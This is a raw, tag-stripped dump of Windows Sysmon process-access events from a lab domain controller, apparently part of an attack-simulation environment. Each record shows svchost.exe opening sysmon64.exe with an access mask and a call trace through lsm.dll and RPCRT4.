13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 